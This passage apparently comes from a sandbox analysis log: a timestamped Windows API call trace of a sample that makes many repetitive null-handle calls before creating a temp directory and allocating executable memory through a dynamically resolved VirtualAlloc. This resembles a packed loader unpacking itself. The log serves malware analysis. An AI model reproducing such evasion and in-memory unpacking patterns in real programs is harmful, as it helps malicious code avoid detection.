0x0 [0176.453] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.453] GetMenu (hWnd=0x0) returned 0x0 [0176.453] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.453] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.453] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.453] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.453] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.453] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.453] GetStockObject (i=6) returned 0x1b00018 [0176.453] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.453] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.453] PathFileExistsW (pszPath=0x0) returned 0 [0176.453] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.453] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.453] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.453] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.453] GetMenu (hWnd=0x0) returned 0x0 [0176.453] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.453] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.453] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.453] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.453] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.453] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.453] GetStockObject (i=6) returned 0x1b00018 [0176.453] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.453] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.453] PathFileExistsW (pszPath=0x0) returned 0 [0176.453] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.453] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.453] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.453] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.453] GetMenu (hWnd=0x0) returned 0x0 [0176.453] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.453] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.454] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.454] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.454] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.454] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.454] GetStockObject (i=6) returned 0x1b00018 [0176.454] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.454] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.454] PathFileExistsW (pszPath=0x0) returned 0 [0176.454] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.454] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.454] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.454] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.454] GetMenu (hWnd=0x0) returned 0x0 [0176.454] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.454] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.454] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.454] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.454] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.454] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.463] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38412f8 | out: hHeap=0x3840000) returned 1 [0176.463] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38412d0 | out: hHeap=0x3840000) returned 1 [0176.463] HeapFree (in: hHeap=0x3840000, dwFlags=0x0, lpMem=0x38412c0 | out: hHeap=0x3840000) returned 1 [0176.463] SendMessageA (hWnd=0x0, Msg=0x418, wParam=0x0, lParam=0x0) returned 0x0 [0176.463] SetRect (in: lprc=0x18f56c, xLeft=0, yTop=0, xRight=0, yBottom=0 | out: lprc=0x18f56c) returned 1 [0176.463] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0176.464] GetTempPathA (in: nBufferLength=0x27, lpBuffer=0x1d4d130 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0176.464] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c20000 [0176.464] GetTempFileNameA (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x18f724 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\A16C.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\a16c.tmp")) returned 0xa16c [0176.469] DeleteFileA (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\A16C.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\a16c.tmp")) returned 1 [0176.469] CreateDirectoryA (lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\A16C.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\a16c.tmp"), lpSecurityAttributes=0x0) returned 1 [0176.470] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0176.470] VirtualAlloc (lpAddress=0x0, dwSize=0x32000, flAllocationType=0x3000, flProtect=0x40) returned 0x300000 [0176.471] GetDlgItem (hDlg=0x0, nIDDlgItem=200) returned 0x0 [0176.471] GetWindowRect (in: hWnd=0x0, lpRect=0x18f5f4 | out: lpRect=0x18f5f4) returned 0 [0176.471] GetDlgItem (hDlg=0x0, nIDDlgItem=149) returned 0x0 [0176.471] GetWindowRect (in: hWnd=0x0, lpRect=0x18f588 | out: lpRect=0x18f588) returned 0 [0176.471] GetUpdateRect (in: hWnd=0x1, lpRect=0x18f60c, bErase=0 | out: lpRect=0x18f60c) returned 0 [0176.471] GetForegroundWindow () returned 0x600a0 [0176.471] GetWindow (hWnd=0x0, uCmd=0x4) returned 0x0 [0176.471] GetParent (hWnd=0x0) returned 0x0 [0176.471] SendMessageA (hWnd=0x0, Msg=0x223, wParam=0x0, lParam=0x0) returned 0x0 [0176.472] SendMessageA (hWnd=0x0, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x0 [0176.472] GetParent (hWnd=0x0) returned 0x0 [0176.472] SendMessageA (hWnd=0x0, Msg=0x221, wParam=0x0, lParam=0x0) returned 0x0 [0176.472] GetDlgItem (hDlg=0x0, nIDDlgItem=-232) returned 0x0 [0176.472] GetDlgItem (hDlg=0x0, nIDDlgItem=-232) returned 0x0 [0176.472] GdiplusStartup (in: token=0x18f384, input=0x18f3e4, output=0x0 | out: token=0x18f384, output=0x0) returned 0x0 [0176.576] BeginPaint (in: hWnd=0x0, lpPaint=0x18f414 | out: lpPaint=0x18f414) returned 0x0 [0176.576] EndPaint (hWnd=0x0, lpPaint=0x18f414) returned 0 [0176.577] CreateWindowExA (dwExStyle=0x0, lpClassName="button", lpWindowName=0x0, dwStyle=0x5000000b, X=250, Y=200, nWidth=32, nHeight=32, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x0 [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.577] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.578] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.579] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.580] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0176.581] CheckMenuItem (hMenu=0x0, 